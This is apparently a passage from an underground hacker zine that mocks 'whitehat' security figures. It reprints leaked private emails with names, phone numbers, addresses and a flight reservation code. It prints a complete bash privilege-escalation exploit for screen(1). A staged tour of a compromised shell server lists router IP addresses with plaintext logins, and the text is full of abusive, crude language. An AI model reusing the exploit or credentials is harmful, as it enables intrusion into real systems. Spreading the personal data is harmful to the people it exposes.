they had -debug on and they logged some information to * /var/dt/tmp/DTSPCD.log * * * For fix information see: * CERT Advisory CA-2001-31 Buffer Overflow in CDE Subprocess * Control Service * * * some thanks/greets to: * gersh, yowie, plaguez, sircasm, K2, silitek, SolarDiz, _j_j, none, %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: no D1ck ir sin Subject: RE: . Noir, check this out... a friend of mine coded it up... I'll get ya that ttdb sploit soon, I'm just travelling in the US right now. I hope you hadd a good Xmas/New Year... Later, K2 noir sin wrote: > Hi K2, > > nothing much these days, I am packing up ; ). will change the damn place I > am living .. so not much coding or anything > so how you doin? btw, happy new year > > > BTW: I passed your code to a couple of ADM guys, they really liked it. > which one telnetd or Tru64 ttdb ? > > I didnt work on the ttdb fmt exploit lately. I will be so much happy if you > could enlighten me about the issue ... > Actually, I am working out a project that will pack almost all known > exploits and some unknown exploits > for Solaris and maybe some Tru64. ( well main reason is I only got some > Solaris boxens and a Tru64 access ) > > I wish to keep in touch with skilled ppl like you, I believe we can exchange > real good info. > > take care, > noir > > -----Original Message----- > From: K2 [mailto:ktwo@ktwo.ca] > To: noir@olympos.org > Subject: . > > noir, How is it going? You getting that ttdb code working? I've got some > time next week if you still having trouble, I'll work it out. > > BTW: I passed your code to a couple of ADM guys, they really liked it. 
> > Take care, > K2 > Attach: dtspcd-8.4.tgz Size: 30K note: a glimpse of the most elite zeroday trading network %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Subject: West Point Hey Lance, Glad to hear that nfo helped out :) I got clearence to get late february off to go speak if the spot's still open :) Lemme know thx!! K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Expect a ADMmutate copy eventually ;) but i was talking to my man... and like you can ask me questions to relay to him if you want. Cool about West Point I'll leason with Dragos for flights and stuffs... Thx again. K2 Lance Spitzner wrote: > K2 wrote: > > Hey Lance, This version of the dtspcd exploit has been out for quite some > > time. at least 3 months, it's the same version Ihave. Do you know what > > signature it set off from snort? > > Standard SPARC Shellcode, alert below. > > [**] [1:645:2] SHELLCODE sparc NOOP [**] > [Classification: Executable code was detected] [Priority: 1] > :05.950417 208.61.1.160:3594 -> 172.16.1.102:6112 > TCP TTL:48 TOS:0x0 ID:41402 IpLen:20 DgmLen:1500 DF > ***AP*** Seq: 0xFF24BFA4 Ack: 0x5F79CFDD Win: 0x3EBC TcpLen: 32 > TCP Options (3) => NOP NOP TS: 463986841 4158950 > [Xref => http://www.whitehats.com/info/IDS353] > > > The guy that wrote it put in some passwords for binaires that would be > > distributed, so unfortuntatly some kiddies probably got it and are running > > it all over the 'net :( > > heh heh, I sure do. First, do you have an exact date when this code > exploit was written? I'm curious to see how long it went from actual > code to the the kiddie community. > I'm thinking of writing a KYE paper on this exploit. The paper would > outline the life cycle of an exploit. From vulnerability identification, > to exploit code, to common kiddie use. We seem to have knowledge of > all the elements. 
This would make a very beneficial paper to the > community if we could document this process. What do you think about > such a paper? We would need some input from the person who wrote the > exploit, but anonymity would not be a problem. I know alot of .gov/.mil > people would be very interested in such a work. Thoughts? > > By the way, you are famous as hell with the following agencies, Max > Kilger and I talked about you. > > NSA, CIA, FBI, DoD, NSF, NIST, DARPA, NPS, DoJ, Secret Service, etc ... :) > > love and kisses ... > > lance > note: ktwo and lance are the best narc duo i've ever seen %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: West Point, we are a go Lance, What dates should I get booked off from work? (I'm actually just going to work remotely, so I can be pretty libral). What format will the talks be? Any of the SUN box's look pretty fly man :) I love rack mount!! I'll take a peek at that paper soon, I'm remote from home until next week so I'm pretty slow on a few things (I am in the US right now). TTYL! K2 Lance Spitzner wrote: > All right gents, > > We are a go for West Point on 26 December. Dragos, > as always I'm putting in a personal request for the > leather pants. I need a bio from you folks, so send > me one before Monday if possible. They need the bios > so they can determine just how many people are going > to attend our presentation :) > > They asked for estimates on travel expenses, this is > what I gave them (just for travelling). > > Dragos/K2 - $1,200 each > Michael/Jeff - $150 each > > Go ahead and make your travel arrangements know (especially > K2 and Dragos). If my travel estimates are off, I need > to know now. This is what they told me about airports > --- snip snip --- > > The best airport is Stewart/Newburgh (SWF) about 20 miles north of West > Point. 
Other airports in order of ease/distance include: > > Newark, NJ (EWR) > LaGuardia, NY (LGA) > JFK, NY (JFK) > > Although I have never flown in/out of Westchester (HPN), I have heard > positive things about the airport if you can get a flight. > > --- snip snip --- > > -- > Lance Spitzner > http://project.honeynet.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Viz Engine Subject: Re: your mail Sure, I'll take a look. K2 Viz Engine wrote: > hi, > > I have a private exploit for wu-imapd, developed it for linux and BSD. > Since I have no access to Solaris or HP-UX I would like to ask you to > port it to those systems. Would you? > > Viz %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: glined glined is a type of ban on IRC: "I was glined" == "I was globally banned from the undernet". If you connect multiple times to IRC from the same IP (3 or more), you will be glined (for abuse). Take care, K2 Lance Spitzner wrote: > Dude, > > What in the hell does 'glined' mean? This is taken > from the GFORCE chats. > > :D1ck :i have the whole billing system > :D1ck :glined > :D1ck :i have the whole billing system of example > :D1ck :oye > :D1ck :heh > :J4n3 :lol > :J4n3 :glined how ? > :J4n3 :they didn't have the same ip > :J4n3 :billing system of example ?? > > Thanks! > > -- > Lance Spitzner > http://project.honeynet.org note: lance is a dumb fuck %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspc attack Here is what I got from jduck (talk to him to see if he wants his name in the final report, though). I can help with the writeup when I get back to Van; jd said it's cool if you contact him too. [jduck(dcc)] 1. discovered by aix in 1999 [jduck(dcc)] aix fixed it in 1999 [jduck(dcc)] 2. re-discovered by ISS in 2000 in solaris [jduck(dcc)] err 2001 perhaps?
[jduck(dcc)] disclosed to sun in march 2001 [jduck(dcc)] cert/iss/etc disclosed to public november 2001 [jduck(dcc)] exploit created late november 2001 [jduck(dcc)] given to trusted people and testers [jduck(dcc)] carelessly left around by certain people and stolen [jduck(dcc)] shared by unknown others jdrake@qoop.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: R1Ley Hassell Subject: Re: Hey man sure, just keep it to self right ;) What's new? I'm still lookin for new work :( Later, K2 Riley Hassell wrote: > You got a copy of the new dtspc sploit? > > -R > Attach: dtspcd-8.6.tgz Size: 35K %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit usage OK, gimme some time on this one, I've never used the sploit. Lance Spitzner wrote: > K2, > > Dude, I notified several .gov agencies that we > have obtained the exploit. They can use this > information to better protect against attacks. > I figured your buddy will not mind, as we obtained > it from 'the wild'. > > Anyways, could you give me a short paragraph on > how the exploit works and is used? Organizations > need to understand how the tool works, and how > the kiddies can use it. You are the > expert, so your insight will greatly help. > > Thanks! > > lance > note: cant figure it out smart guy? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) I'll ask him Lance Spitzner wrote: > Your buddy interested in chatting with the MITRE folks? > A lot of people are very impressed with his exploit :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: J4ne Gray > To: Lance Spitzner > Subject: Re: dtspcd exploit obtained > > I went to the apparent author's website.
It hardly mentions an interest in security, > but it does look like he used to teach at the University of Central Michigan > http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with this > person at all? > > I'm wondering if he didn't write this code to teach someone else and then that person > started distributing it. This guy looks like he knows his stuff and not stripping the > symbols doesn't seem to fit with that. > > Josh > > Lance Spitzner wrote: > > > J4ne Gray wrote: > > > > > It was very nice of the author to include his name and email :). I was looking > > > at the strings output and it looks like the author took a lot of time to do error > > > checking and write one of the better usage statements i've seen. I also didn't > > > notice a single misspelling and no script kiddish text at first glance. To me > > > that says a few things about the author. Is this typical of what you see in > > > exploit code? Most of the stuff i've seen in public postings is nowhere near > > > this clean. > > > > It's extremely well written, and powerful. Definitely not our > > typical exploit :) > > > > lance %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: dtspcd exploit obtained (fwd) that's funny Lance Spitzner wrote: > K2 wrote: > > > I'll ask him > > Dude, this is not a big deal. Just a lot of > people interested in his exploit code, it's more > impressive than most. NSA and FBI even asked > me for a copy. :) > > lance note: nsa cant write their own version? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Dug Song Subject: Re: feh lame o KIller man, thx :))) Dug Song wrote: > this is the most retarded shite: > > http://www.ngsec.com/whitepapers.html > > btw, i rewrote fragrouter as fragroute (runs on your local > machine).
evades everything, including snort, and it will hide all of > your shellcode NOPs as well, with any of the TCP chaffing attacks or > TCP segment forward overlap: > > http://www.monkey.org/~dugsong/fragroute-0.1.tar.gz > > don't redistribute, it's rough code that i want to clean up for > release sometime... > > -d. > > --- > http://www.monkey.org/~dugsong/ %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Cloakware Corporation Subject: Re: Network Intrusion Detection Charlene, I was just wondering, Stanley told me about a demonstration package of your cloaking technologie where a binary with some source code is sent out. Do you think I could have a copy of this? Thanks much, Shane %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner Subject: Re: IRC chats Well, It's probably a spoof... beer:~# telnet pentagon-hqdadss.army.pentagon.mil 23 Trying 134.11.6.1... Connected to pentagon-hqdadss.army.pentagon.mil. Escape character is '^]'. VM/ESA ONLINE--HQDADSS --PRESS BREAK KEY TO BEGIN SESSION.^] telnet> q Connection closed. VM/OS box, idono, Idoubt that somebody is IRC'ng from there ;) CU K2 Lance Spitzner wrote: > Looks like one of the guys is coming in from pentagon.army.mil. > Is this correct? > > -- > Lance Spitzner > http://project.honeynet.org note: its the analyzer!!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ---------- Forwarded message ---------- From: Matt Conover To: w00w00@blackops.org Subject: w00w00 with TechTV TechTV had a segment on the ethics of hacking with a featured commentary on w00w00. See it at http://www.techtv.com/news/security/story/0,24195,3369909,00.html. Matt note: w00w00 looks lame lately, keep it up! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan Subject: Re: your mail Catherine: Here you are, sorry for the sparsity but I am very private about many of the details outlined by the bio guidelines. 
K2 is a security engineer. He works on a variety of systems ranging from most any UNIX flavor to any other lesser OS. He has spent a lot of time working through security issues wherever they exist; core kernels, networking services or binary protections. K2 is a member of w00w00 and is a contributing member of The Honeynet Project. I would like to thank Anya for all her help and support throughout the year. Thanks, K2 note: Cathy, could you please add: k2 is also owned %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan cc: Kate Glennon Hi, Sorry I've been in Toronto all week and did not see these mails (i've only had remote access to mail). I'll get the changes back to you by tomarrow morning. Thanks, K2 Catherine Nolan wrote: > Hey K2 - > I need your revisions today.....the book is going to the printer next week > and I need to have your chapter copyedited, laid out, and reviewed. > If the book doesn't go to press next week - we're not going to have books in > time for doubleday book club. Doubleday has ordered a significant number of > copies for a promotion - the books must be in their warehouse by March 4th. > It takes at least a week and a half to print a book - usually longer. As a > royaltied author - if we miss this date - we miss 3500 units in sales. This > will affect your income from your contribution considerably. > > They are not happy if we don't ship our books on time. > > I cannot impress upon you the urgency of this matter - your revisions were > due on Monday - it is now Thursday. > > Please send these revisions to me as soon as you can - preferably before the > end of the day. > > Thank you, > Catherine > > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Presby, T. 
MAJ EECS" Subject: Re: USMA - Honey Net Travel Arrangements Major Presby: Thanks for your help, I was just wondering if is possiable that I change the return portion of this trip to layover in Kansas City until Sunday March 3 I'll pay any difference in cost (it may even be cheaper with the Saturday stay). Thanks, K2 Presby, T. MAJ EECS wrote: > K2, > > Your invitational travel orders are complete and we look forward to your > visit later this month. An electronic ticket has been generated and will be > waiting for you at the Vancouver Airport. A complete itinerary is available > at https://virtuallythere.com. Use the following reservation code and your > last name to view your itinerary. > > Reservation Code: ESEUXD > > Your flight travels via Chicago to Newark, so you will be on the same flight > as Dragos Ruiu and Lance Spitzner. Lance is authorized the rental car, so > you will travel in one vehicle to West Point. > > Your lodging costs will be covered during your stay. Please contact the > Hotel Thayer to reserve and hold your room for 25-26 Dec with your credit > card (you will be reimbursed after the fact). Hotel Thayer has a website > http://www.hotelthayer.com/ and they can be reached at 1-800-247-5047. > Ensure that you mention that you are traveling under invitational travel > orders and require the government rate. > > Please feel free to contact me if you have additional questions. We look > forward to your visit. > > Tim > Major Timothy Presby > Asst. Prof., Dept. of Electrical Engineering and Computer Science > United States Military Academy, West Point, NY 10996 > Thayer Hall 113 Phone: 845-938-5569 DSN: 688 > Email: timothy-presby@usma.edu note: hey timmy, smile for the cameras!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Subject: !.? miss you %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: joewee Subject: Re: defcon? joewee: where are you ? I'm in NYC now. 
TTYL K2 joewee wrote: > from dt; > > > Sounds very cool. I'd be interested in reading the book when it comes > out. People always talk about writing a book like that, but no one ever > does. > On another note, do you know if ADM or w00w00 has anything up their > sleeves > that might make for a good release at DEF CON? With the cDc basically > falling through the last two years we are looking to see if any > respectable > groups have something cool they want to showcase and release come con > time. > > ---- > > anyone plan on going to defcon? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Lance Spitzner cc: 'Dragos Ruiu' , Subject: Re: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT (fwd) From what I hear gobbles is a composit, (made up from more then 1) person(s). But it's all speculation anyhow. There's tons of Solaris holes, and a grandious claim that "if you run it your vuln" is always BS, I'm sure a moderately hardend host would be fine. ttyl, K2 Lance Spitzner wrote: > Who the f*ck is this guy. He repeatedly has the most interesting > posts I've ever read. The note at the bottom has me concerned :) > > -- > Lance Spitzner > http://project.honeynet.org > > ---------- Forwarded message ---------- > From: gobbles@hushmail.com > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org, > vuln-dev@securityfocus.com, bugs@securitytracker.com > Subject: ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT > > Dear World, > Below is copy paste of GOBBLES advisory for NTOP. NTOP available from +www.ntop.org. This serious remote root bug in logging mechanism. Time for +alert and disclosure is now. > > Website with other advisories at http://www.bugtraq.org. It look like shit +because on free host. GOBBLES poor researcher who not out for the big dollar, +and nothing that can be done about this at this time. > ... > Greets: > Our #1 fan, Dave Aitel. 
Dave, GOBBLES love you -- you get free GOBBLES Security tshirt at Defcon. > > > Love to all (but especially to "bob"), > GOBBLES Security > http://www.bugtraq.org > GOBBLES@hushmail.com > > > ps: GOBBLES currently in communication with Sun Microsystems about lethal remote bug in Solaris 6, 7, and 8. Sun has asked GOBBLES to wait one month to release advisory so that service can be fixed. GOBBLES not sure if he can wait this long, but will try very hard to not click "send" for while longer on hole. If you run Solaris, likely you are vulnerable. But you will have to wait. > > No joke, this serious remote root hole. GOBBLES turned blind eye to argument from hackers about danger of releasing vulnerabilities. GOBBLES know that only hackers care about non-disclosure. Anyone else is likely to be very boring. :)))) > > Hey, GOBBLES considered two ways of getting fame and recognition for he world-class security group... 1. put up a message board on bugtraq.org with gobbles group name branded all over it and let world know he have private exploits... 2. submit ground-breaking research to the securityfocus mailing lists..... > > hey, the latter has a bigger audience ;))))))) > > Hush provide the worlds most secure, easy to use online applications - which solution is right for you? > HushMail Secure Email http://www.hushmail.com/ > HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/ > Hush Business - security for your Business http://www.hush.com/ > Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/ > > Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople > ------------ Output from pgp ------------ > Pretty Good Privacy(tm) Version 6.5.8 > (c) 1999 Network Associates Inc. > Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc. > Export of this software may be restricted by the U.S. government. > File is signed. signature not checked. > key does not meet validity threshold. 
> WARNING: Because this public key is not certified with a trusted > signature, it is not known with high confidence that this public key > actually belongs to: "(KeyID: 0x2199B00F)". note: GOBBLE GOBBLE, lance afraid of the turkey?! :PpppPPpPPPp %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Ragsdale, D. LTC EECS" Subject: Re: Glad to hear you are coming to NY LTC Ragsdale: I'm glad that most of the exploits worked. The local privalage escalation exploits may be a little more trickey, I think I had sent a couple whitch will break a non-executable stack, these tend to be a lot more fradgile, maybe play with the stack offset values and script a brute forcing script... Sure, I'm sort of hap-hazardly getting my life together here, I'm booked solid through May-5, but will be available after that. Let me know whenmight work for you and I'll work with that. Talk to you later, K2 PS. My recent trip reminded me that almost 4years ago I nearly enlisted to the US Army, but then decided to go on for more school. Ragsdale, D. LTC EECS wrote: > K2; > > The Solaris exploits you sent were excellent. They were just what I > needed. I had luck with all of them except the user2root buffer overflows > - I could not get the offsets right. Any suggestions? > > Also, is there any chance we could convince you to spend a day with > us in the near future? We would pay any travel expenses and, possibly, > provide monetary compensation for your time. We would ask you to assist us > to by implementing working exploits in our lab. Tell me what you think. > > -Dan note: well Liutenant dan, ktwo already works for CSIS, sorry! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% ############### I N C L O S I N G %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% i hope you enjoyed this little look into the liFe of a whitehat, which can be summed up in: m0nEy-Ca$h-lameness. 
from mediocre crackers, to full blown security professionals, you've certainly made it easy on us! ktwo, be gracious we left out your kewl poems! catch me next month as i feature more whitehat allstars for your viewing pleasure. NO MERCY FOR WHITEHATS!!@#@# -- odaymaztr .~e~----------------------------------------------------------~e~. ; *03* zeroday screen exploit -- lcamtuf ; `----------------------------------------------------------------' [CUT_HERE] screen.sh #!/bin/bash # **DO NOT DISTRIBUTE** # # A simple screen(1) exploit (tested against 3.09.11) # - by Michal Zalewski (lcamtuf@bos.bindview.com) # ---------------------------------------------------- # Usage: "./unscreen", then resume screen `00'. # ---------------------------------------------------- # Ugh, blah... Should be written in C, but I don't # really care now :) # I haven't had time to check other versions, but see # if this works for you too... # # This exploit is private, but you know that already... # # **DO NOT DISTRIBUTE** # SCREEN=/usr/bin/screen umask 0 if [ ! -x $SCREEN ]; then echo "I can't execute $SCREEN..." exit 0 fi LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa if [ -f "$LINK" ]; then echo "DAMN. I don't have usable pts socket available..." exit 0 fi echo -ne "Finding root owned tty...\t\t" unset TTY for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then TTY="$x" break fi done echo -n "$TTY" if [ "$TTY" = "" ]; then echo -e "\nI can't find a root owned tty!" exit 0 fi if [ ! -w $HOME -o ! -w /tmp ]; then echo -e "\nI can't write $HOME/.screenrc or to /tmp..." 
exit 0 fi cat >$HOME/.screenrc <<_EOF_ vbell on defscrollback 100 autodetach on termcapinfo * '' 'hs:ts=\E_:fs=\E\\:ds=\E_\E\\' defsocketpath $LINK _EOF_ echo -ne "\nStarting screen...\t\t\t" $SCREEN -S 00 -c $HOME/.screenrc -aA -m -D -q &>/dev/null & SCPID=`echo $!` echo -n "PID: $SCPID" while :; do sleep 1 if [ "$#" -ge "0" ]; then break fi done cd /tmp ln -fs $LINK $HOME/ &>/dev/null echo -ne "\nWaiting for socket to be created...\t" CNT=5 # Timeout while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do let CNT=$CNT-1 sleep 1 done echo -n "Done." echo -ne "\nLinking to root owned terminal...\t\t" ln -fs $TTY $LINK &>/dev/null echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..." $SCREEN -wipe &>/dev/null & rm -fr $HOME/.screenrc $LINK &>/dev/null echo -ne "\rComplete.\n" exit 1 [END_CUT] screen.sh .~e~----------------------------------------------------------~e~. ; *04* lyfestylez of the owned and lamest with pm -- r0b1nleech ; `----------------------------------------------------------------' PART ONE: Hello, and welcome, to lyfestylez of the owned and lamest hehe Our guest today is pm. pm runs one of the most secure + shell systems known to mankind, tell us about your system pm. well robin, first off i would like to introduce myself my handle stands for prepubescent monkey, no just kidding! it + stands for plurbious monk. i have hosted one of the most well known + and well renounced shell systems ever. yes thats right, i run sneakerz.org :D sneakerz.org is home to some of the finest hackers that grace + our planet earth. freebsd employees and yahoo employees also use + our super secure system. Hey pm, tell our viewers where you have worked recently :) well robin, i have worked at Yahoo!, google, hotmail, microsoft, and + iss. i have been all over.. hehe Thats quite a line up. yes r0b1n, i have a vast amount of security knowledge, i am a + security professional. props to w00w00 and ADM! oh ya, HFD! 
oh i would like to also state that: I HAVE NEVER BEEN OWNED, IF YOU + SAY YOU OWN ME, SHOW ME SOME FUCKING LOGS. IF YOU DONT HAVE LOGS + SHUT YOUR FUCKING LAME MOUTH BECAUSE YOU DONT OWN SHIT. hehe So pm, which known hackers have used your system? well, off the top of my head there is: jobe, napster, billf, + ratcorpse, par (cant fucking forget the par master), jbl, stran9er, + darkcube, jduck, shok, cr, cryp, suid, dmess0r, nimrood, duke + mux, yowie, udp, korndogz (kinda lame), awnex, jimjones, soupnazi, + miff (9mm HFD!), paul, and knowfx. damn i have a good memory hehe I would like to point out for a second that napster is + the guy who started napster.com, jbl is cripo of SSG, cr is one + of the best known crackers in hacker history (unix bowling team), + and duke is the best whitehat i have ever seen. yes i've watched cr hack before, he's real good and props to #!w00w00 on efnet What is the #!w00w00 key? no key for you r0b1n :) route and dugsong hang out there, really elite channel let's take a break for a second and watch some midget porn PART TWO: Welcome back, let's get on with the show. hehe I am currently on pm's system, this is an amazing sight. + This system is so locked down its ridiculous. I don't think anyone + could ever hack this. yes r0b1n, its secured real tight, and has custom freebsd kernel mods. I am currently sitting in the root directory, pm, show us + around :) why of course r0b1n. hmm where to start ok, lets just go straight to the good stuff first # cd /home/staff/monk ok here we are, my sacred directory, this is where all my private + files go, all my warez, and all my mail goes. 
# ls |less 983.tsl_bind.c* lice420pre7.tar.gz* BigIron-EXO1.tftp* lo* BigIron-Exo1.tftp* mail/ BigIron-HE1.tftp* md5passwd.c* BigIron-HE2.tftp* me.jpg* BigIron-SU1.tftp* moo* BigIron-SU2.tftp* ms-ip.txt Extacy.c mutt-sneakerz-14095-0* Mail/ mutt-sneakerz-309-0* Messages* mutt-sneakerz-43165-0* NetIron-HE1.tftp* new-server-guidelines.txt* NetIron-HE2.tftp* newircd.tgz* NetIron-SU1.tftp* par* NetIron-SU2.tftp* par2.pl* README* pixconfig* README.skuld* pm* Trng-07_BGP4.ppt* pos.ppt* _mywctb.ircrc* quotes.txt* a* res.txt* a.c resume.txt* acl.txt* rh7linuxconf.pl.txt ascii_woman.txt* route.gif* babykitty* sendmail.c backup.sneakerz.monk.2.28.01.tar.gz server.sh* bgp.exo* shells* bobek.c* sinner* cbufp_cb.pdf* sk8.bx* cco.txt* skuld3.tar.gz* chbin* solx86_bind.c cisco* story* cluepon.txt* temp/ dave.jpg* textbox.irc.lb3* fakepmap.c* tmp/ fbsd2.c* tranny.asc* foodfight.swf* tronban* freebsd.app* tsl_bind.c* freebsd.app.old* vchans.txt* h0h0cc.asc* wanker-14.jpg hardcopy.0 wctb.irc* hm/ wu2.6.1.c* ircchiq.tar www/ kline* xf0rce.zip libproxybnc-2.0b.tar.gz Wow, what an absolutely stunning home directory, you + so elegantly define caviar dreams. 
i try, hehe, thanks r0b1n Ok, show us some of your files why of course $ head imnotownedstill.txt :p_m!dave@right.behind.you PRIVMSG #!w00w00 :gobbles sucks balls :p_m!dave@right.behind.you PRIVMSG #!w00w00 :we should make them eat our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then shit out our shit :p_m!dave@right.behind.you PRIVMSG #!w00w00 :then make them eat the the shit that they shit that was our shit that we made them eat :p_m!dave@right.behind.you PRIVMSG #!w00w00 :*read slowly* :p_m!dave@right.behind.you PRIVMSG #!w00w00 :GOBBLES: :p_m!dave@right.behind.you PRIVMSG #!w00w00 :"ALL YOU MOTHER FUCKERS ARE GONNA PAY, YOU ARE THE ONES WHO ARE THE BALL LICKERS, WE'RE GONNA FUCK YOUR MOTHERS WHILE YOU WATCH AND CRY LIKE LITTLE WHINEY BITCHES, ONCE WE GET TO HOLLYWOOD AND FIND THOSE MIRAMAX FUCKS WHOS MAKEN THE MOVE WE'RE GONNA MAKE THEM EAT OUR SHIT THEN SHIT OUT OUR SHIT AND THEN EAT THEIR SHIT THATS MADE UP OF OUR SHIT THAT WE MADE THEM EAT AND THEN ALL YOU MOTHERFUCKS ARE NEXT" :p_m!dave@right.behind.you PRIVMSG #!w00w00 :-w00w00 ok lets see, ah, shells is a pretty private file, i use it for + hacking elite shit. 
# head -n 20 shells 12.0.40.1 - cisco 12.127.196.202 - cisco1:cisco 131.192.70.218 (s0.inso.bbnplanet.net) - cisco 157.130.68.154 (rutenberg-gw.customer.ALTER.NET) - cisco:cisco 192.195.18.6 (cisco.nstor.com) - cisco 194.149.131.1 (e0-rbs1.MARNet.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.10 (e0-0-rbs3.MARNet.mk) 194.149.131.127 (tc.rek.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.131.3 (e0-rbs2.UKIM.edu.mk) 194.149.144.1 - gone:mitre-strelata / ena:rtremt-toboim 194.149.148.2 (rtrzsv.zsv.ukim.edu.mk) - gone:quattro224 / ena:%qqriq% 194.149.150.1 - gone:quattro224 / ena:%qqriq% 194.98.212.19 (bowne-gw.iway.fr) - cisco 200.41.13.242 (200.41.13.242.celcaribe.net) - admin:admin 200.41.13.253 (200.41.13.253.celcaribe.net) - admin:admin 202.109.81.230 - cisco:cisco (switch) 202.161.128.22 - cisco 202.54.40.17 - cisco:cisco 204.167.134.158 (s0.aww.bbnplanet.net) - test:test 207.115.184.1 - cisco Oh, My, God, are those seriously .edu.mk routers?! :) ok check this out # ls Mail 4166174806@mobile.att.net jack@google.com spider@funksion.org beep-spider@jsnet.com knowfx@sneakerz.org spider@hotmail.com beepspider@jsnet.com monk@sneakerz.org spider@sneakerz.org binary@ruiner.halo.nu paul@mu.org sweetiegirl331@aol.com bright@wintelcom.net promo@akula.com walt@hotmail.com dav@sneakerz.org soupnazi@sneakerz.org i met sweetiegrl331 in #linuxteens, damn shes amazing Love :) Hey, I noticed a route.gif in the above output of ls? thats route naked at r00tparty 3. 
enough with my homedir for a second, lets check out ratcorpse's # cd /home/users/rat # ls Mail/ funny* me-modified.jpg* rc.c* adaptec gogo226a.tgz me-original.jpg* shrt* ass2.doc* hahaha mp3s.txt* sk8.bx* badass.jpg hehh* ncurses.h sk8.irc* blingbling.jpg index.html* netscape1.c.txt* term.h buffr.c* ircrc.example* newfris.jpg* tmp/ damnfunny ircrc.global* ns* tron.txt* dickd.tar.gz* jim* orange1.jpg url* elite.c* leto* pageexec.txt* vas0103.txt* epic* llist.c* patch-howto.html vhosts* f* log.txt r* wargames* fefe.zip* mbox rand0m.c* www/ shes so funny, check out the www # ls www/ 06cubicl.jpg* leet.adv* pumpkin.jpg* Bow-lusta.txt* lice420pre7.tar* resume* OBSDecian* links.html* route.gif* akittens-confessionz* list* route.jpg* angieb.jpg* logs.html* rpclogo.jpg* crow/ look.jpg* s/ cvf-sk00led* m1x* sexchart* cvf-sk00led2* me.gif* shot/ dance.gif* me.html* siphon-v.7.tar* duke/ misc/ slut1.jpg* dumbkitten.txt* mixowned* slut2.jpg* dxmd.jpg* modified.jpg* some-funny-ass-takeover* dxmpix/ p.jpg* sundevices.beta* freestyle* pageexec.txt* toomuchtime.jpg* fugly/ party/ u4ea-skooled* ghettodxm.jpg* phat1.jpg* url* gookfest.jpg* phat2.jpg* war* greets.html* phat3.jpg* warped.jpg* gross/ phat4.jpg* weed.jpg* housewarming.jpg* phracklog* whore.jpg* hp2.adv* pix/ work/ in-bud-we-trust.jpg* potleaf1.jpg* index.html* prankster.jpg* lol, thats confidence This is great, are you getting all of this guys? hohohoho check this out # cat mailstuff | less bright:> To: bright@sneakerz.org bright:Delivered-To: alfred@freebsd.org bright:Delivered-To: bright@sneakerz.org bright:Errors-To: 